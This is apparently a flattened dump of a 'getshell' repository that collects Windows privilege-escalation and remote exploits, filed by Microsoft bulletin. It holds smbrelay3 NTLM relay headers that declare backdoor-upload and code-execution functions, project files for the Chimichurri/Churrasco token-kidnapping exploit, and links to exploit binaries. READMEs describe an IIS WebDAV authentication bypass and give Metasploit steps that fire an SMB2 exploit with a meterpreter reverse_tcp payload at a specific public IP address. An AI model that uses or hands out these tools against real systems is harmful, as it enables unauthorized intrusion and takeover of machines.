https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/libeay32.dll -------------------------------------------------------------------------------- /MS08-068/smbrelay3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/smbrelay3.exe -------------------------------------------------------------------------------- /MS08-068/smrs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/smrs.exe -------------------------------------------------------------------------------- /MS08-068/src/httprelay.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/src/httprelay.cpp -------------------------------------------------------------------------------- /MS08-068/src/httprelay.h: -------------------------------------------------------------------------------- 1 | #ifndef _HTTPRELAY_H_ 2 | #define _HTTPRELAY_H_ 3 | 4 | #include "smbrelay.h" 5 | 6 | //HTTP Functions 7 | int HandleIncommingHTTPRequest(RELAY *relay, char *destinationhostname, int destinationport); 8 | int ReadRequest(RELAY *relay, char *request, int requestsize); 9 | char **ParseHeaders(char *lpBuffer, unsigned int *nheaders); 10 | char *GetHeaderValue(char **header, int nheaders, char *Header) ; 11 | 12 | #endif 13 | 14 | 15 | -------------------------------------------------------------------------------- /MS08-068/src/imaprelay.h: -------------------------------------------------------------------------------- 1 | #ifndef _IMAP_RELAY_ 2 | #define _IMAP_RELAY_ 3 | 4 | #include "smbrelay.h" 5 | 6 | int HandleIncommingIMAPRequest(RELAY *relay, char *destinationhostname,int destinationport); 7 | 8 | #endif 9 | 10 | -------------------------------------------------------------------------------- /MS08-068/src/misc.h: -------------------------------------------------------------------------------- 1 | /* 2 | Misc data manipulation functions for Smbrelay 3 | Andres Tarasco 4 | */ 5 | #ifndef _MISC_FUNCTIONS_H_ 6 | #define _MISC_FUNCTIONS_H_ 7 | #define _CRT_SECURE_NO_DEPRECATE 8 | 9 | #include 10 | 11 | 12 | #pragma pack(1) 13 | #ifdef WIN32 14 | #include 15 | #include 16 | #else 17 | #pragma align 1 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include //pthread 26 | #include //toupper 27 | #include 28 | #include 29 | #define SOCKET int 30 | #define _strnicmp strncasecmp 31 | #define closesocket close 32 | #define Sleep(a) sleep(a/1000) 33 | #define INVALID_SOCKET -1 34 | #endif 35 | //#include "smbrelay.h" 36 | #include "ntlm.h" 37 | 38 | typedef struct 39 | { 40 | SOCKET source; 41 | struct sockaddr_in sourceaddr; 42 | 43 | SOCKET destination; 44 | struct sockaddr_in destinationaddr; 45 | 46 | int dstProtocol; 47 | char hostname[256]; 48 | } RELAY; 49 | 50 | #define CONNECT_TIMEOUT 10 51 | #define SMBWAITTIMEOUT 5 52 | #define DBG_DUMP_ROWS 16 53 | 54 | 55 | void DumpMem(void* string, int length) ; 56 | char *ReadFileToSend(int *BackdoorFileSize,char*lpBackdoorFile); 57 | 58 | int ConnectToRemoteHost(RELAY *relay,char *hostname, int port); 59 | //int SendBytesAndWaitForResponse(RELAY *relay,char *source, int nBytes, char *destination, int MaxReadSize,int timeout); 60 | int SendBytesAndWaitForResponse(SOCKET destination,char *source, int nBytes, char *destinationBuffer, int MaxReadSize,int timeout); 61 | void WriteDataToReportFile(char *lpLogFileFilename, tSmbNtlmAuthResponse* NtlmAuthResponse, char *SourceIpAddress,unsigned char *challenge); 62 | void CleanLine(int verbose); 63 | void usage(void); 64 | void Banner(void); 65 | 66 | #endif 67 | 68 | -------------------------------------------------------------------------------- /MS08-068/src/ntlm.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/src/ntlm.cpp -------------------------------------------------------------------------------- /MS08-068/src/payload.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/src/payload.cpp -------------------------------------------------------------------------------- /MS08-068/src/payload.h: -------------------------------------------------------------------------------- 1 | #ifndef _PAYLOAD_ 2 | #define _PAYLOAD_ 3 | #include "smbrelay.h" 4 | #include "smb.h" 5 | #include "ntlm.h" 6 | 7 | void CleanLine(int verbose); 8 | smheader *BuildSmbPacket1(void); 9 | smheader *GetSmbPacket2(RELAY *relay,smheader* Packet1); 10 | smheader *GetSmbPacket3(smheader* SmbPacket2,char *lpUserName, char *lpPassword, char *domainname, char *host, tSmbNtlmAuthResponse* OptionalNtlmPacket3); 11 | smheader *GetSmbPacket3Alt(smheader* SmbPacket2,char *lpUserName, char *lpPassword, char *domainname, char *host, tSmbNtlmAuthResponse* OptionalNtlmPacket3); 12 | 13 | int WriteRemoteFile(RELAY relay, smheader *buffer, char *lpFileName); 14 | char *GenerateFTPTransfer(char *buffer,char *host, int port, char *username, char *password, char *downloadfile,char *optionalparameter); 15 | int AttackWeakServices(RELAY relay, char *buf,char *path, uint16 FID, char *ServicePath); 16 | 17 | 18 | #endif 19 | 20 | -------------------------------------------------------------------------------- /MS08-068/src/pop3relay.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/src/pop3relay.cpp -------------------------------------------------------------------------------- /MS08-068/src/pop3relay.h: -------------------------------------------------------------------------------- 1 | #ifndef _POP3_RELAY_ 2 | #define _POP3_RELAY_ 3 | 4 | #include "smbrelay.h" 5 | 6 | int HandleIncommingPOP3Request(RELAY *relay, char *destinationhostname,int destinationport); 7 | 8 | #endif 9 | 10 | -------------------------------------------------------------------------------- /MS08-068/src/smb.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/src/smb.cpp -------------------------------------------------------------------------------- /MS08-068/src/smbrelay.h: -------------------------------------------------------------------------------- 1 | #ifndef _SBMRELAY_H_ 2 | #define _SMBRELAY_H_ 3 | 4 | #define _CRT_SECURE_NO_DEPRECATE 5 | #include 6 | #ifdef WIN32 7 | #include 8 | #define socklen_t int 9 | #endif 10 | #include "misc.h" 11 | #include "smb.h" 12 | #include "ntlm.h" 13 | 14 | 15 | #define GetNTLMPacketFromSmbPacket(a) ((char*)a+0x2b+4) 16 | #define GetNTLMPacket3FromSmbPacket(a) ((char*)a+ sizeof(smheader) -sizeof(((smheader*)a)->buffer) +sizeof(SessionSetupAndX)) 17 | 18 | #define SmbPacketLen(a) (SREV(a->SmbMessageLength)+4) 19 | //#define PrintErrorMessage(a) printf("%s",a); return(0); 20 | //#define PrintErrorMessage(a) printf(a); return(0); 21 | 22 | #define ATTACK_NONE 0x00 23 | #define REPLAY_HTTP 0x01 24 | #define REPLAY_SMB 0x02 25 | #define REPLAY_POP3 0x03 26 | #define REPLAY_IMAP 0x04 27 | #define REPLAY_SMTP 0x05 28 | #define REPLAY_DNS 0x06 29 | #define REPLAY_TELNET 0x07 30 | #define REPLAY_MSSQL 0x08 31 | 32 | #define PSEXEC 0x10 33 | 34 | #define debug (verbose==2) 35 | 36 | 37 | 38 | //Functions 39 | //int InitSmbHandshake(RELAY *relay,char *Buffer, int BufferSize); 40 | int HandleIncommingSmbRequest(RELAY *relay, char *destinationhostname, int destinationport); 41 | 42 | int ReplayAttackAgainst(int Protocol,char *hostname, int port); 43 | int StablishNTLMSession(RELAY relay,char *host, char *lpUserName, char *lpPassword); 44 | int ExecuteCode( RELAY relay); 45 | 46 | 47 | 48 | 49 | #endif 50 | 51 | 52 | -------------------------------------------------------------------------------- /MS08-068/src/smbrelay3.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/src/smbrelay3.cpp -------------------------------------------------------------------------------- /MS08-068/src/smtprelay.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS08-068/src/smtprelay.cpp -------------------------------------------------------------------------------- /MS08-068/src/smtprelay.h: -------------------------------------------------------------------------------- 1 | #ifndef _SMTP_RELAY_ 2 | #define _SMTP_RELAY_ 3 | 4 | #include "smbrelay.h" 5 | 6 | int HandleIncommingSMTPRequest(RELAY *relay, char *destinationhostname,int destinationport); 7 | 8 | #endif 9 | 10 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/.svn/all-wcprops: -------------------------------------------------------------------------------- 1 | K 25 2 | svn:wc:ra_dav:version-url 3 | V 114 4 | /travis/!svn/ver/12/trunk/Briefings%20and%20Trainings/BH_Vegas_10/Briefings/CD/Speakers/Cerrudo/Source/Chimichurri 5 | END 6 | stdafx.h 7 | K 25 8 | svn:wc:ra_dav:version-url 9 | V 123 10 | /travis/!svn/ver/12/trunk/Briefings%20and%20Trainings/BH_Vegas_10/Briefings/CD/Speakers/Cerrudo/Source/Chimichurri/stdafx.h 11 | END 12 | Chimichurri.sln 13 | K 25 14 | svn:wc:ra_dav:version-url 15 | V 130 16 | /travis/!svn/ver/12/trunk/Briefings%20and%20Trainings/BH_Vegas_10/Briefings/CD/Speakers/Cerrudo/Source/Chimichurri/Chimichurri.sln 17 | END 18 | Chimichurri.cpp 19 | K 25 20 | svn:wc:ra_dav:version-url 21 | V 130 22 | /travis/!svn/ver/12/trunk/Briefings%20and%20Trainings/BH_Vegas_10/Briefings/CD/Speakers/Cerrudo/Source/Chimichurri/Chimichurri.cpp 23 | END 24 | Chimichurri.ncb 25 | K 25 26 | svn:wc:ra_dav:version-url 27 | V 130 28 | /travis/!svn/ver/12/trunk/Briefings%20and%20Trainings/BH_Vegas_10/Briefings/CD/Speakers/Cerrudo/Source/Chimichurri/Chimichurri.ncb 29 | END 30 | Chimichurri.vcproj 31 | K 25 32 | svn:wc:ra_dav:version-url 33 | V 133 34 | /travis/!svn/ver/12/trunk/Briefings%20and%20Trainings/BH_Vegas_10/Briefings/CD/Speakers/Cerrudo/Source/Chimichurri/Chimichurri.vcproj 35 | END 36 | stdafx.cpp 37 | K 25 38 | svn:wc:ra_dav:version-url 39 | V 125 40 | /travis/!svn/ver/12/trunk/Briefings%20and%20Trainings/BH_Vegas_10/Briefings/CD/Speakers/Cerrudo/Source/Chimichurri/stdafx.cpp 41 | END 42 | Chimichurri.suo 43 | K 25 44 | svn:wc:ra_dav:version-url 45 | V 130 46 | /travis/!svn/ver/12/trunk/Briefings%20and%20Trainings/BH_Vegas_10/Briefings/CD/Speakers/Cerrudo/Source/Chimichurri/Chimichurri.suo 47 | END 48 | ReadMe.txt 49 | K 25 50 | svn:wc:ra_dav:version-url 51 | V 125 52 | /travis/!svn/ver/12/trunk/Briefings%20and%20Trainings/BH_Vegas_10/Briefings/CD/Speakers/Cerrudo/Source/Chimichurri/ReadMe.txt 53 | END 54 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/.svn/entries: -------------------------------------------------------------------------------- 1 | 10 2 | 3 | dir 4 | 12 5 | https://version.blackhat.com/travis/trunk/Briefings%20and%20Trainings/BH_Vegas_10/Briefings/CD/Speakers/Cerrudo/Source/Chimichurri 6 | https://version.blackhat.com/travis 7 | 8 | 9 | 10 | 2010-07-19T09:07:13.639647Z 11 | 12 12 | l3d 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | f34b9ec8-1d56-11df-a875-f7b3e3ed8622 28 | 29 | stdafx.h 30 | file 31 | 32 | 33 | 34 | 35 | 2010-06-11T01:27:40.000000Z 36 | 60235d38c536cf115628e1bd69467abe 37 | 2010-07-19T09:07:13.639647Z 38 | 12 39 | l3d 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 312 62 | 63 | Chimichurri.sln 64 | file 65 | 66 | 67 | 68 | 69 | 2010-06-11T01:39:56.000000Z 70 | 7006fbdb3117c17119d3da69be2872c1 71 | 2010-07-19T09:07:13.639647Z 72 | 12 73 | l3d 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 911 96 | 97 | Debug 98 | dir 99 | 100 | Chimichurri.cpp 101 | file 102 | 103 | 104 | 105 | 106 | 2010-06-28T17:48:50.000000Z 107 | e1e8d4ce035d86eef9e940645a00c8c2 108 | 2010-07-19T09:07:13.639647Z 109 | 12 110 | l3d 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 4543 133 | 134 | Chimichurri.ncb 135 | file 136 | 137 | 138 | 139 | 140 | 2010-06-28T17:53:12.000000Z 141 | 90bdd6c54d88fa98999513c45bc49876 142 | 2010-07-19T09:07:13.639647Z 143 | 12 144 | l3d 145 | has-props 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 60416 167 | 168 | Chimichurri.vcproj 169 | file 170 | 171 | 172 | 173 | 174 | 2010-06-11T01:41:12.000000Z 175 | c656691a8a1a5d9048deedbdaafd7f2a 176 | 2010-07-19T09:07:13.639647Z 177 | 12 178 | l3d 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 3928 201 | 202 | stdafx.cpp 203 | file 204 | 205 | 206 | 207 | 208 | 2009-11-18T03:05:44.000000Z 209 | e076114fface995051412addbd7fa4b5 210 | 2010-07-19T09:07:13.639647Z 211 | 12 212 | l3d 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 296 235 | 236 | Chimichurri.suo 237 | file 238 | 239 | 240 | 241 | 242 | 2010-06-28T17:53:12.000000Z 243 | 108567eae75d166680b9adf892fd064c 244 | 2010-07-19T09:07:13.639647Z 245 | 12 246 | l3d 247 | has-props 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 9216 269 | 270 | ReadMe.txt 271 | file 272 | 273 | 274 | 275 | 276 | 2009-11-18T03:05:44.000000Z 277 | 08b0572071b66b591ab56dac4de6e0f4 278 | 2010-07-19T09:07:13.639647Z 279 | 12 280 | l3d 281 | 282 | 283 | 284 | 285 | 286 | 287 | 288 | 289 | 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | 300 | 301 | 302 | 1316 303 | 304 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/.svn/prop-base/Chimichurri.ncb.svn-base: -------------------------------------------------------------------------------- 1 | K 13 2 | svn:mime-type 3 | V 24 4 | application/octet-stream 5 | END 6 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/.svn/prop-base/Chimichurri.suo.svn-base: -------------------------------------------------------------------------------- 1 | K 13 2 | svn:mime-type 3 | V 24 4 | application/octet-stream 5 | END 6 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/.svn/text-base/Chimichurri.ncb.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS09-012/Chimichurri/.svn/text-base/Chimichurri.ncb.svn-base -------------------------------------------------------------------------------- /MS09-012/Chimichurri/.svn/text-base/Chimichurri.sln.svn-base: -------------------------------------------------------------------------------- 1 | Microsoft Visual Studio Solution File, Format Version 8.00 2 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Chimichurri", "Chimichurri.vcproj", "{94A3EC47-DAA8-4CBD-8E65-4923F764C659}" 3 | ProjectSection(ProjectDependencies) = postProject 4 | EndProjectSection 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfiguration) = preSolution 8 | Debug = Debug 9 | Release = Release 10 | EndGlobalSection 11 | GlobalSection(ProjectConfiguration) = postSolution 12 | {94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Debug.ActiveCfg = Debug|Win32 13 | {94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Debug.Build.0 = Debug|Win32 14 | {94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Release.ActiveCfg = Release|Win32 15 | {94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Release.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(ExtensibilityGlobals) = postSolution 18 | EndGlobalSection 19 | GlobalSection(ExtensibilityAddIns) = postSolution 20 | EndGlobalSection 21 | EndGlobal 22 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/.svn/text-base/Chimichurri.suo.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS09-012/Chimichurri/.svn/text-base/Chimichurri.suo.svn-base -------------------------------------------------------------------------------- /MS09-012/Chimichurri/.svn/text-base/ReadMe.txt.svn-base: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : Uroboros2 Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this Uroboros2 application for you. 6 | This file contains a summary of what you will find in each of the files that 7 | make up your Uroboros2 application. 8 | 9 | 10 | Uroboros2.vcproj 11 | This is the main project file for VC++ projects generated using an Application Wizard. 12 | It contains information about the version of Visual C++ that generated the file, and 13 | information about the platforms, configurations, and project features selected with the 14 | Application Wizard. 15 | 16 | Uroboros2.cpp 17 | This is the main application source file. 18 | 19 | ///////////////////////////////////////////////////////////////////////////// 20 | Other standard files: 21 | 22 | StdAfx.h, StdAfx.cpp 23 | These files are used to build a precompiled header (PCH) file 24 | named Uroboros2.pch and a precompiled types file named StdAfx.obj. 25 | 26 | ///////////////////////////////////////////////////////////////////////////// 27 | Other notes: 28 | 29 | AppWizard uses "TODO:" comments to indicate parts of the source code you 30 | should add to or customize. 31 | 32 | ///////////////////////////////////////////////////////////////////////////// 33 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/.svn/text-base/stdafx.cpp.svn-base: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // Uroboros2.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/.svn/text-base/stdafx.h.svn-base: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | #include 8 | #include 9 | #include 10 | 11 | // TODO: reference additional headers your program requires here 12 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/Chimichurri.ncb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS09-012/Chimichurri/Chimichurri.ncb -------------------------------------------------------------------------------- /MS09-012/Chimichurri/Chimichurri.sln: -------------------------------------------------------------------------------- 1 | Microsoft Visual Studio Solution File, Format Version 8.00 2 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Chimichurri", "Chimichurri.vcproj", "{94A3EC47-DAA8-4CBD-8E65-4923F764C659}" 3 | ProjectSection(ProjectDependencies) = postProject 4 | EndProjectSection 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfiguration) = preSolution 8 | Debug = Debug 9 | Release = Release 10 | EndGlobalSection 11 | GlobalSection(ProjectConfiguration) = postSolution 12 | {94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Debug.ActiveCfg = Debug|Win32 13 | {94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Debug.Build.0 = Debug|Win32 14 | {94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Release.ActiveCfg = Release|Win32 15 | {94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Release.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(ExtensibilityGlobals) = postSolution 18 | EndGlobalSection 19 | GlobalSection(ExtensibilityAddIns) = postSolution 20 | EndGlobalSection 21 | EndGlobal 22 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/Chimichurri.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS09-012/Chimichurri/Chimichurri.suo -------------------------------------------------------------------------------- /MS09-012/Chimichurri/Debug/.svn/all-wcprops: -------------------------------------------------------------------------------- 1 | K 25 2 | svn:wc:ra_dav:version-url 3 | V 120 4 | /travis/!svn/ver/12/trunk/Briefings%20and%20Trainings/BH_Vegas_10/Briefings/CD/Speakers/Cerrudo/Source/Chimichurri/Debug 5 | END 6 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/Debug/.svn/entries: -------------------------------------------------------------------------------- 1 | 10 2 | 3 | dir 4 | 12 5 | https://version.blackhat.com/travis/trunk/Briefings%20and%20Trainings/BH_Vegas_10/Briefings/CD/Speakers/Cerrudo/Source/Chimichurri/Debug 6 | https://version.blackhat.com/travis 7 | 8 | 9 | 10 | 2010-07-19T09:07:13.639647Z 11 | 12 12 | l3d 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | f34b9ec8-1d56-11df-a875-f7b3e3ed8622 28 | 29 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : Uroboros2 Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this Uroboros2 application for you. 6 | This file contains a summary of what you will find in each of the files that 7 | make up your Uroboros2 application. 8 | 9 | 10 | Uroboros2.vcproj 11 | This is the main project file for VC++ projects generated using an Application Wizard. 12 | It contains information about the version of Visual C++ that generated the file, and 13 | information about the platforms, configurations, and project features selected with the 14 | Application Wizard. 15 | 16 | Uroboros2.cpp 17 | This is the main application source file. 18 | 19 | ///////////////////////////////////////////////////////////////////////////// 20 | Other standard files: 21 | 22 | StdAfx.h, StdAfx.cpp 23 | These files are used to build a precompiled header (PCH) file 24 | named Uroboros2.pch and a precompiled types file named StdAfx.obj. 25 | 26 | ///////////////////////////////////////////////////////////////////////////// 27 | Other notes: 28 | 29 | AppWizard uses "TODO:" comments to indicate parts of the source code you 30 | should add to or customize. 31 | 32 | ///////////////////////////////////////////////////////////////////////////// 33 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // Uroboros2.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /MS09-012/Chimichurri/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | #include 8 | #include 9 | #include 10 | 11 | // TODO: reference additional headers your program requires here 12 | -------------------------------------------------------------------------------- /MS09-012/Churraskito-source.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS09-012/Churraskito-source.zip -------------------------------------------------------------------------------- /MS09-012/MS09-012KB952004-CVE-2009-0079-烤肉Churrasco.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS09-012/MS09-012KB952004-CVE-2009-0079-烤肉Churrasco.rar -------------------------------------------------------------------------------- /MS09-012/README.md: -------------------------------------------------------------------------------- 1 | # MS09-012 2 | 3 | MS09-012 4 | 5 | 6 | Vulnerability reference: 7 | * [MS09-012](https://technet.microsoft.com/library/security/ms09-012) 8 | * [CVE-2009-0079](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0079) 9 | 10 | ## Usage 11 | ``` 12 | /xxoo/-->Usage: pr.exe command 13 | ``` 14 | ![pr](pr.png) 15 | ![churrasco](churrasco.png) 16 | 17 | ## References 18 | [Token Kidnapping's Revenge](https://media.blackhat.com/bh-us-10/whitepapers/Cerrudo/BlackHat-USA-2010-Cerrudo-Toke-Kidnapping's-Revenge-wp.pdf) 19 | 20 | ## Thanks 21 | thanks for ***sam rou*** 22 | 23 | -------------------------------------------------------------------------------- /MS09-012/churrasco.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS09-012/churrasco.png -------------------------------------------------------------------------------- /MS09-012/pr.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS09-012/pr.exe -------------------------------------------------------------------------------- /MS09-012/pr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS09-012/pr.png -------------------------------------------------------------------------------- /MS09-020/MS09-020-KB970483-CVE-2009-1535-IIS6.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS09-020/MS09-020-KB970483-CVE-2009-1535-IIS6.zip -------------------------------------------------------------------------------- /MS09-020/README.md: -------------------------------------------------------------------------------- 1 | # MS09-020 2 | ``` 3 | The WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms, 4 | and list folders or read, create, or modify files, via a %c0%af (Unicode / character) at an arbitrary position in the URI, 5 | as demonstrated by inserting %c0%af into a "/protected/" initial pathname component to bypass the password protection on the protected\ folder, 6 | aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122. 7 | ``` 8 | 9 | Vulnerability reference: 10 | * [MS09-020](https://technet.microsoft.com/library/security/ms09-020) 11 | * [CVE-2009-1535](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1535) 12 | 13 | Usage: 14 | ``` 15 | iis6.0.exe command 16 | ``` 17 | ![iis6](iis6.0.png) 18 | 19 | ## load the module within the Metasploit 20 | [msf judgment](https://www.rapid7.com/db/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass) 21 | ``` 22 | msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass 23 | msf auxiliary(dir_webdav_unicode_bypass) > show actions 24 | ...actions... 25 | msf auxiliary(dir_webdav_unicode_bypass) > set ACTION 26 | msf auxiliary(dir_webdav_unicode_bypass) > show options 27 | ...show and set options... 28 | msf auxiliary(dir_webdav_unicode_bypass) > run 29 | ``` 30 | ``` 31 | msf auxiliary(webdav_scanner) > run 32 | 33 | [+] 192.168.16.136 (Microsoft-IIS/6.0) has WEBDAV ENABLED 34 | [*] Scanned 1 of 1 hosts (100% complete) 35 | [*] Auxiliary module execution completed 36 | ``` -------------------------------------------------------------------------------- /MS09-020/iis6.0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS09-020/iis6.0.png -------------------------------------------------------------------------------- /MS09-050/README.md: -------------------------------------------------------------------------------- 1 | # MS09-050 2 | 3 | ``` 4 | This module exploits an out of bounds function table dereference in the SMB 5 | request validation code of the SRV2.SYS driver included with Windows Vista, 6 | Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. 7 | Windows Vista without SP1 does not seem affected by this flaw. 8 | ``` 9 | 10 | Vulnerability reference: 11 | * [MS09-050](https://technet.microsoft.com/library/security/ms09-050) 12 | * [CVE-2009-2532](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2532) 13 | 14 | ## Usage 15 | ``` 16 | msf > search MS09_050 17 | msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index 18 | msf exploit(ms09_050_smb2_negotiate_func_index) > options 19 | msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp 20 | msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost 110.196.193.102 21 | msf exploit(ms09_050_smb2_negotiate_func_index) > run 22 | ``` 23 | 24 | 25 | 26 | ## load the module within the Metasploit console 27 | [msf](https://www.rapid7.com/db/modules/exploit/windows/smb/ms09_050_smb2_negotiate_func_index) 28 | ``` 29 | msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index 30 | msf exploit(ms09_050_smb2_negotiate_func_index) > show targets 31 | ...targets... 32 | msf exploit(ms09_050_smb2_negotiate_func_index) > set TARGET 33 | msf exploit(ms09_050_smb2_negotiate_func_index) > show options 34 | ...show and set options... 35 | msf exploit(ms09_050_smb2_negotiate_func_index) > exploit 36 | ``` 37 | 38 | ## References 39 | [MS09-050漏洞测试](http://edu.aqniu.com/group/30/thread/107) 40 | [MS09-050 vulnerability](https://www.youtube.com/watch?v=cytEOUQ6QsI) 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /MS10-012/README.md: -------------------------------------------------------------------------------- 1 | # MS10-012 2 | ``` 3 | This security update resolves one publicly disclosed and several privately reported vulnerabilities in Microsoft Windows. 4 | The vulnerabilities could allow remote code execution if an attacker sent a specially crafted SMB response to a client-initiated 